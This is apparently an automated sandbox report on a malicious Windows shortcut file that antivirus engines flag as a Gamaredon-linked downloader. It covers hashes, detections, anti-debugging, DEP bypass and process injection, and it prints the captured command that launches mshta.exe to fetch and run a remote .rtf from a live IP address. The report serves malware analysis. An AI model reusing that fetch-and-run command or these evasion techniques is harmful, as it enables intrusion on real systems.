Summary | ZeroBOX

49fd9bf8a9029185e03f469c388fbe3c.lnk

Generic Malware AntiVM Lnk Format AntiDebug GIF Format
Category: FILE
Machine: s1_win7_x6401
Started: Aug. 10, 2024, 6:23 p.m.
Completed: Aug. 10, 2024, 6:26 p.m.
Size 997.0B
Type MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments, Icon number=1, Archive, ctime=Sun Oct 1 11:50:20 2023, mtime=Sun Oct 1 11:50:20 2023, atime=Sun Dec 31 19:48:41 2017, length=14848, window=hide
MD5 49fd9bf8a9029185e03f469c388fbe3c
SHA256 bec05802abb6bb5068092983510d1ee0cc7252c2c3c9ab8bf4947c34341eb854
CRC32 51432773
ssdeep 12:8eNDGBm/oPocuW+VSXcJZECAAhSSxD8jAisPMfwXvfcoAOdE8niNNjJoJM7+lbYQ:8eN3wPc5DhSSx8AieiGcN8WFab+mE
Yara
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format
  • Generic_Malware_Zero - Generic Malware

Name | Response | Post-Analysis Lookup
No hosts contacted.

IP Address | Status | Action
5.39.254.55 | Active | Moloch

Suricata Alerts

Flow | SID | Signature | Category
TCP 192.168.56.101:49164 -> 5.39.254.55:80 | 2027257 | ET INFO Dotted Quad Host RTF Request | Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API: GlobalMemoryStatusEx
Status: 1
Return: 1
Repeated: 0

suspicious_features: Connection to IP address
suspicious_request: GET http://5.39.254.55/sp_08.08/days.rtf
request: GET http://5.39.254.55/sp_08.08/days.rtf
Time & API: NtProtectVirtualMemory
Arguments:
  process_identifier: 2664
  stack_dep_bypass: 0
  stack_pivoted: 0
  heap_dep_bypass: 0
  length: 4096
  protection: 64 (PAGE_EXECUTE_READWRITE)
  base_address: 0x73352000
  process_handle: 0xffffffff
Status: 1
Return: 0
Repeated: 0

file: C:\Users\test22\AppData\Local\Temp\49fd9bf8a9029185e03f469c388fbe3c.lnk
cmdline: "C:\Windows\System32\mshta.exe" http://5.39.254.55/sp_08.08/days.rtf /f
Time & API: NtProtectVirtualMemory
Arguments:
  process_identifier: 2664
  stack_dep_bypass: 0
  stack_pivoted: 0
  heap_dep_bypass: 1
  length: 4096
  protection: 32 (PAGE_EXECUTE_READ)
  base_address: 0x7ef80000
  process_handle: 0xffffffff
Status: 1
Return: 0
Repeated: 0

Matched rules:
  • DebuggerCheck__GlobalFlags (no description)
  • DebuggerCheck__QueryInfo (no description)
  • DebuggerHiding__Thread (no description)
  • DebuggerHiding__Active (no description)
  • ThreadControl__Context (no description)
  • SEH__vectored (no description)
  • anti_dbg - Checks if being debugged
  • disable_dep - Bypass DEP

host: 5.39.254.55
Time & API: RegSetValueExA
Arguments:
  key_handle: 0x000002d4
  regkey_r: ProxyEnable
  reg_type: 4 (REG_DWORD)
  value: 0
  regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
Status: 1
Return: 0
Repeated: 0

Process injection: Process 2552 resumed a thread in remote process 2664

Time & API: NtResumeThread
Arguments:
  thread_handle: 0x00000334
  suspend_count: 1
  process_identifier: 2664
Status: 1
Return: 0
Repeated: 0
Lionic Trojan.WinLNK.Nioc.4!c
Cynet Malicious (score: 99)
CAT-QuickHeal LNK.APT.43736
VIPRE Heur.BZC.YAX.Nioc.1.0B26EB2A
Arcabit Heur.BZC.YAX.Nioc.1.0B26EB2A
Symantec Trojan.Gen.NPE
ESET-NOD32 LNK/TrojanDownloader.Pterodo.G
Avast LNK:Agent-CR [Trj]
Kaspersky HEUR:Trojan.WinLNK.Gamaredon.gen
BitDefender Heur.BZC.YAX.Nioc.1.0B26EB2A
MicroWorld-eScan Heur.BZC.YAX.Nioc.1.0B26EB2A
Emsisoft Heur.BZC.YAX.Nioc.1.0B26EB2A (B)
F-Secure Malware.LNK/Dldr.Agent.VPTN
FireEye Heur.BZC.YAX.Nioc.1.0B26EB2A
Sophos Troj/DownLnk-X
Google Detected
Avira LNK/Dldr.Agent.VPTN
MAX malware (ai score=83)
Microsoft Trojan:Win32/ShortSeek.E!dha
ZoneAlarm HEUR:Trojan.WinLNK.Gamaredon.gen
GData Heur.BZC.YAX.Nioc.1.0B26EB2A
Varist LNK/ABTrojan.UXKK-
Zoner Probably Heur.LNKScript
Tencent Win32.Trojan.Gamaredon.Rsmw
huorong Trojan/LNK.Starter.r
Fortinet LNK/Agent.VPTN!tr
AVG LNK:Agent-CR [Trj]
alibabacloud Trojan[downloader]:Win/ShortSeek.E9hyq